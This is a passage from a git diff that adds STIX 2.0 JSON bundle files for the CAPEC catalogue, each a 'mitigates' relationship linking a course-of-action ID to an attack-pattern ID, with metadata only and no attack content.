b/capec/relationship/relationship--38d069d4-4832-41a5-8156-70a3596620bf.json new file mode 100644 index 0000000000..2063c2f1e3 --- /dev/null +++ b/capec/relationship/relationship--38d069d4-4832-41a5-8156-70a3596620bf.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d03fd412-68b7-4f9d-9aa4-6e673c2ffc10", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--38d069d4-4832-41a5-8156-70a3596620bf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b34670c6-335f-4603-b4a0-bffa0c404c7f", + "target_ref": "attack-pattern--fafd41d0-eecf-4518-8f23-4145219d48de", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3952c82d-c89f-4067-9788-6a3a29d3ef5b.json b/capec/relationship/relationship--3952c82d-c89f-4067-9788-6a3a29d3ef5b.json new file mode 100644 index 0000000000..135ed7bdec --- /dev/null +++ b/capec/relationship/relationship--3952c82d-c89f-4067-9788-6a3a29d3ef5b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6f2f21c4-c1c6-477e-a787-f6a636db79ff", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3952c82d-c89f-4067-9788-6a3a29d3ef5b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0bae5ab-7fc8-4817-922b-5879e4edca34", + "target_ref": "attack-pattern--0e6d2797-eedc-4782-8e0c-eb9a682d2b54", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--39f5e21d-6c4f-4738-9d0c-1fce0621d0a0.json b/capec/relationship/relationship--39f5e21d-6c4f-4738-9d0c-1fce0621d0a0.json new file mode 100644 index 0000000000..e9ab7b7ed1 --- /dev/null +++ b/capec/relationship/relationship--39f5e21d-6c4f-4738-9d0c-1fce0621d0a0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--76aa984c-d3c6-467c-8d12-51aca0f0c30c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--39f5e21d-6c4f-4738-9d0c-1fce0621d0a0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3868f5b2-2b41-4c78-957f-67972e41c9ec", + "target_ref": "attack-pattern--4c20557e-86ee-4ba3-97e5-6cd0772e9356", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3ac4cb17-60a8-410b-b924-49850bf5e00d.json b/capec/relationship/relationship--3ac4cb17-60a8-410b-b924-49850bf5e00d.json new file mode 100644 index 0000000000..f343c5412c --- /dev/null +++ b/capec/relationship/relationship--3ac4cb17-60a8-410b-b924-49850bf5e00d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c8d182f8-bcfe-414d-a513-b4b47d423f18", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3ac4cb17-60a8-410b-b924-49850bf5e00d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--39addebd-df68-43c2-84f2-ae1ba9653ad8", + "target_ref": "attack-pattern--80de694a-0a84-40b1-9c56-ec04747ca485", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3ad69ce4-412d-4639-8737-c22355bad36c.json b/capec/relationship/relationship--3ad69ce4-412d-4639-8737-c22355bad36c.json new file mode 100644 index 0000000000..d9ab3d40bd --- /dev/null +++ b/capec/relationship/relationship--3ad69ce4-412d-4639-8737-c22355bad36c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--20aaf20e-a1b8-4266-8f9a-8d96bc74b5c1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3ad69ce4-412d-4639-8737-c22355bad36c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5", + "target_ref": "attack-pattern--21bfa3d5-3aa2-450e-bbe4-5bf8f49e3c2f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3aff07c6-531e-48f5-a2f0-14adeae03995.json b/capec/relationship/relationship--3aff07c6-531e-48f5-a2f0-14adeae03995.json new file mode 100644 index 0000000000..998c506a86 --- /dev/null +++ b/capec/relationship/relationship--3aff07c6-531e-48f5-a2f0-14adeae03995.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f7bafa96-a7ce-4c3a-a499-b89bd7862761", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3aff07c6-531e-48f5-a2f0-14adeae03995", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--dbf9a25e-d615-4e5d-98c7-6332cae5810a", + "target_ref": "attack-pattern--2d7b12ba-47d5-4617-be01-dfa415317b93", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3b1b196e-a5d4-4a1f-bc3b-2a1aa3ab5b37.json b/capec/relationship/relationship--3b1b196e-a5d4-4a1f-bc3b-2a1aa3ab5b37.json new file mode 100644 index 0000000000..a22129187c --- /dev/null +++ b/capec/relationship/relationship--3b1b196e-a5d4-4a1f-bc3b-2a1aa3ab5b37.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f5edb9f7-defb-4bf2-9478-d36c70271f4c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3b1b196e-a5d4-4a1f-bc3b-2a1aa3ab5b37", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1834ed8b-031c-4fde-b646-172ad9a8f15d", + "target_ref": "attack-pattern--b0aa23d7-5fa9-427f-8fb4-7c287b109797", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3c30a18d-ff08-4fbc-8b9f-4a270cbcd1f7.json b/capec/relationship/relationship--3c30a18d-ff08-4fbc-8b9f-4a270cbcd1f7.json new file mode 100644 index 0000000000..4e6e8c4433 --- /dev/null +++ b/capec/relationship/relationship--3c30a18d-ff08-4fbc-8b9f-4a270cbcd1f7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1e855a3a-cc92-41c0-a6f7-a0a0cb38ca4f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3c30a18d-ff08-4fbc-8b9f-4a270cbcd1f7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--061b49b1-f4f3-4237-80b2-fa402ab9054d", + "target_ref": "attack-pattern--f933e0a9-328c-4b49-ad26-c2442a24a3c3", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3c6dba09-e75d-4a64-8220-7d71fbb3ca03.json b/capec/relationship/relationship--3c6dba09-e75d-4a64-8220-7d71fbb3ca03.json new file mode 100644 index 0000000000..9fcb338f63 --- /dev/null +++ b/capec/relationship/relationship--3c6dba09-e75d-4a64-8220-7d71fbb3ca03.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1ed2baf5-0625-4e6c-9894-de8a7dfec01a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3c6dba09-e75d-4a64-8220-7d71fbb3ca03", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0e2f45e3-d988-4da1-a19f-202c51c40a0f", + "target_ref": "attack-pattern--072159ee-a734-4aec-8162-f36adbfb2f71", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3cf737b6-79f0-4786-af11-37a8ad5849b1.json b/capec/relationship/relationship--3cf737b6-79f0-4786-af11-37a8ad5849b1.json new file mode 100644 index 0000000000..c7abe02b1d --- /dev/null +++ b/capec/relationship/relationship--3cf737b6-79f0-4786-af11-37a8ad5849b1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--61d71797-4144-40cd-addf-015d428bea7e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3cf737b6-79f0-4786-af11-37a8ad5849b1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--96c87468-200e-4be4-a794-c97c7366f580", + "target_ref": "attack-pattern--c565b674-66ce-418c-8611-0e2cfb445c42", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3cfe6afb-876c-4549-8787-77ff70578ce7.json b/capec/relationship/relationship--3cfe6afb-876c-4549-8787-77ff70578ce7.json new file mode 100644 index 0000000000..e3434e7db8 --- /dev/null +++ b/capec/relationship/relationship--3cfe6afb-876c-4549-8787-77ff70578ce7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b062e044-a085-4953-bf1f-9ab396e28d54", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3cfe6afb-876c-4549-8787-77ff70578ce7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3d2cb91d-f2d5-4e7f-a1dd-eb3e1dec3160", + "target_ref": "attack-pattern--b5d9986e-3ce3-4e71-b9db-34c715b57579", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3d69e68b-f84b-4163-be92-216e1b4112d2.json b/capec/relationship/relationship--3d69e68b-f84b-4163-be92-216e1b4112d2.json new file mode 100644 index 0000000000..a9fffbd6fa --- /dev/null +++ b/capec/relationship/relationship--3d69e68b-f84b-4163-be92-216e1b4112d2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--acdd9985-51dd-4454-b58e-e5bd93f0ae80", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3d69e68b-f84b-4163-be92-216e1b4112d2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--640b34ce-eb05-40c3-854b-abdea45ad098", + "target_ref": "attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3da638be-62d3-463c-b831-d98972595ef7.json b/capec/relationship/relationship--3da638be-62d3-463c-b831-d98972595ef7.json new file mode 100644 index 0000000000..e38e161d35 --- /dev/null +++ b/capec/relationship/relationship--3da638be-62d3-463c-b831-d98972595ef7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3ee012f8-77ee-496b-9105-05ef9b2d9cba", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3da638be-62d3-463c-b831-d98972595ef7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--15ad2592-0331-4e12-ab0f-0d22bcf287dd", + "target_ref": "attack-pattern--4a3aea87-ebbb-4369-bc6b-c774c5899b18", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3db7674a-ce85-49f1-a061-d5c0484d9466.json b/capec/relationship/relationship--3db7674a-ce85-49f1-a061-d5c0484d9466.json new file mode 100644 index 0000000000..e91a429043 --- /dev/null +++ b/capec/relationship/relationship--3db7674a-ce85-49f1-a061-d5c0484d9466.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a43f9e74-b102-49e5-99a1-72837d4c2b30", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3db7674a-ce85-49f1-a061-d5c0484d9466", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8cdfdea0-d970-4ee5-928d-88dcc8b540fb", + "target_ref": "attack-pattern--91d858e1-b052-4ec0-a3a4-da9a6b3dfb9f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3dfc631a-ebe7-4dbe-a48c-5dcf02783a5d.json b/capec/relationship/relationship--3dfc631a-ebe7-4dbe-a48c-5dcf02783a5d.json new file mode 100644 index 0000000000..3dcfbd5e97 --- /dev/null +++ b/capec/relationship/relationship--3dfc631a-ebe7-4dbe-a48c-5dcf02783a5d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--35b8747d-ee68-4d24-a4a5-135b175d5601", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3dfc631a-ebe7-4dbe-a48c-5dcf02783a5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-09-30T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3e6af105-53da-4ebb-ad68-e251d0305e50", + "target_ref": "attack-pattern--4af1aa45-5db1-4fbf-a5ee-f205d163cc9e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3e7a154a-154b-4d77-855d-ff9108b16678.json b/capec/relationship/relationship--3e7a154a-154b-4d77-855d-ff9108b16678.json new file mode 100644 index 0000000000..23fb93ffb4 --- /dev/null +++ b/capec/relationship/relationship--3e7a154a-154b-4d77-855d-ff9108b16678.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ee797458-752b-4dbc-b734-3ec098ecb9b3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3e7a154a-154b-4d77-855d-ff9108b16678", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0783cd89-b8b3-4aab-9755-23328a4742a1", + "target_ref": "attack-pattern--dc538968-9ead-4733-b41b-ef83cb2ed62a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3e962b00-a7d0-42bc-81b7-8c1c8f2a7e4f.json b/capec/relationship/relationship--3e962b00-a7d0-42bc-81b7-8c1c8f2a7e4f.json new file mode 100644 index 0000000000..907d17ef77 --- /dev/null +++ b/capec/relationship/relationship--3e962b00-a7d0-42bc-81b7-8c1c8f2a7e4f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9b08ea79-8398-4f7a-ab90-f79fc9c0fab6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3e962b00-a7d0-42bc-81b7-8c1c8f2a7e4f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--edc6170e-39db-4bd7-8fe9-bcd69b301007", + "target_ref": "attack-pattern--8767e72d-72a4-42d9-a7ec-c03a0776ab7d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3eab43ab-6647-4310-bb1c-917fe6d532c8.json b/capec/relationship/relationship--3eab43ab-6647-4310-bb1c-917fe6d532c8.json new file mode 100644 index 0000000000..149b625b43 --- /dev/null +++ b/capec/relationship/relationship--3eab43ab-6647-4310-bb1c-917fe6d532c8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6e40e1cc-3c81-4176-ae17-52b64827a139", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3eab43ab-6647-4310-bb1c-917fe6d532c8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8981135f-0874-4377-91a7-60102c6c6d08", + "target_ref": "attack-pattern--ba3ec386-76ed-49d9-8257-a4c3a772d6c1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3ecdd1e5-d6b7-43ed-af41-31b29883030d.json b/capec/relationship/relationship--3ecdd1e5-d6b7-43ed-af41-31b29883030d.json new file mode 100644 index 0000000000..f07975d202 --- /dev/null +++ b/capec/relationship/relationship--3ecdd1e5-d6b7-43ed-af41-31b29883030d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2af8c536-d1a3-4a53-9328-bcff2abb4710", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3ecdd1e5-d6b7-43ed-af41-31b29883030d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2169ecc1-a465-4c48-a073-853c776f16ee", + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3ed4317e-bd08-4da8-819d-409b4a553b41.json b/capec/relationship/relationship--3ed4317e-bd08-4da8-819d-409b4a553b41.json new file mode 100644 index 0000000000..c3f65d69a7 --- /dev/null +++ b/capec/relationship/relationship--3ed4317e-bd08-4da8-819d-409b4a553b41.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7bde6d14-a577-4f25-9207-1024c3c3fc23", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3ed4317e-bd08-4da8-819d-409b4a553b41", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d5c9990e-fec4-4e5e-a4bd-07a832e34a43", + "target_ref": "attack-pattern--c3ea9757-0ac9-42b7-96df-a6dfe6f85838", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3ee7e6be-df86-4df0-98cc-76437ba3679c.json b/capec/relationship/relationship--3ee7e6be-df86-4df0-98cc-76437ba3679c.json new file mode 100644 index 0000000000..a4d8f46186 --- /dev/null +++ b/capec/relationship/relationship--3ee7e6be-df86-4df0-98cc-76437ba3679c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--83ace011-7b9c-40ff-8a7b-f24f0061376d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3ee7e6be-df86-4df0-98cc-76437ba3679c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1aec628a-36f6-4e86-a54a-24586daa551a", + "target_ref": "attack-pattern--48e13289-5253-4c34-b449-5ba648c378c0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3eff23ad-da0e-4d77-b000-c19f0aeaf00f.json b/capec/relationship/relationship--3eff23ad-da0e-4d77-b000-c19f0aeaf00f.json new file mode 100644 index 0000000000..d02ffae2a8 --- /dev/null +++ b/capec/relationship/relationship--3eff23ad-da0e-4d77-b000-c19f0aeaf00f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--311df1be-46a9-4bf7-a2a0-b08970e283ea", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3eff23ad-da0e-4d77-b000-c19f0aeaf00f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1e44c94e-9c2c-4855-b235-6abd990a40b4", + "target_ref": "attack-pattern--be442a79-9548-4668-bb33-e24c51b63e55", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3f6129b2-9c1d-44f6-ae21-f8df3235afa6.json b/capec/relationship/relationship--3f6129b2-9c1d-44f6-ae21-f8df3235afa6.json new file mode 100644 index 0000000000..f29b93a7c5 --- /dev/null +++ b/capec/relationship/relationship--3f6129b2-9c1d-44f6-ae21-f8df3235afa6.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9c634a6f-8b3d-44b5-9860-07fbfc264ea9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3f6129b2-9c1d-44f6-ae21-f8df3235afa6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--36a18ef6-828f-4581-8a24-52bfd4172d28", + "target_ref": "attack-pattern--392168be-b0e4-4de3-8529-b956d1396a21", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3f64ffc4-4082-4522-9978-18e5336b64e0.json b/capec/relationship/relationship--3f64ffc4-4082-4522-9978-18e5336b64e0.json new file mode 100644 index 0000000000..972f894cf2 --- /dev/null +++ b/capec/relationship/relationship--3f64ffc4-4082-4522-9978-18e5336b64e0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--498d50fd-9da2-4069-a087-10389ff42f74", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3f64ffc4-4082-4522-9978-18e5336b64e0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f485688f-0921-4277-b3bf-c342d4ebff44", + "target_ref": "attack-pattern--e762106a-5967-4d6c-9887-c06232b6a8af", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3f790849-a989-44bd-8e1d-d4cd541aea66.json b/capec/relationship/relationship--3f790849-a989-44bd-8e1d-d4cd541aea66.json new file mode 100644 index 0000000000..eb02eb0582 --- /dev/null +++ b/capec/relationship/relationship--3f790849-a989-44bd-8e1d-d4cd541aea66.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2a31fa58-39c1-455c-b5af-d3a8f67768bf", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3f790849-a989-44bd-8e1d-d4cd541aea66", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-12T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--016940da-d1ad-4819-b998-04f223a789c4", + "target_ref": "attack-pattern--3825973d-9cb5-4c42-aae0-b9a9cec45da9", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3ff8705f-fc4e-4b8b-81a5-2631871c5b63.json b/capec/relationship/relationship--3ff8705f-fc4e-4b8b-81a5-2631871c5b63.json new file mode 100644 index 0000000000..7680e548d7 --- /dev/null +++ b/capec/relationship/relationship--3ff8705f-fc4e-4b8b-81a5-2631871c5b63.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--781f0b7b-70f6-463e-b722-b5973db72e62", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3ff8705f-fc4e-4b8b-81a5-2631871c5b63", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--07c1f1b1-4d7e-47e9-84dc-7fa4fad4772d", + "target_ref": "attack-pattern--6cb0e050-2567-4733-8766-aaeb09172ed2", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--40aa19f8-24c9-4dc3-876b-4d879bc632d9.json b/capec/relationship/relationship--40aa19f8-24c9-4dc3-876b-4d879bc632d9.json new file mode 100644 index 0000000000..d0c3a4968a --- /dev/null +++ b/capec/relationship/relationship--40aa19f8-24c9-4dc3-876b-4d879bc632d9.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d71dd533-adff-4cd5-9900-cbca28a1baf1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--40aa19f8-24c9-4dc3-876b-4d879bc632d9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--aebeb944-089d-4f75-825e-35491ce299d5", + "target_ref": "attack-pattern--2ebcd4aa-44ae-47e0-9c76-c99c71990a09", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--40f247b7-b73b-42f0-8b9e-82cd806a9bdd.json b/capec/relationship/relationship--40f247b7-b73b-42f0-8b9e-82cd806a9bdd.json new file mode 100644 index 0000000000..5e5ef1614e --- /dev/null +++ b/capec/relationship/relationship--40f247b7-b73b-42f0-8b9e-82cd806a9bdd.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e8a43368-3b30-4373-986d-15a411d07a9e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--40f247b7-b73b-42f0-8b9e-82cd806a9bdd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c6168e3d-14cd-4b0d-95c7-84c53e4b0899", + "target_ref": "attack-pattern--14e62b12-3297-4588-9652-a4443fab37fe", + "object_marking_refs": [ 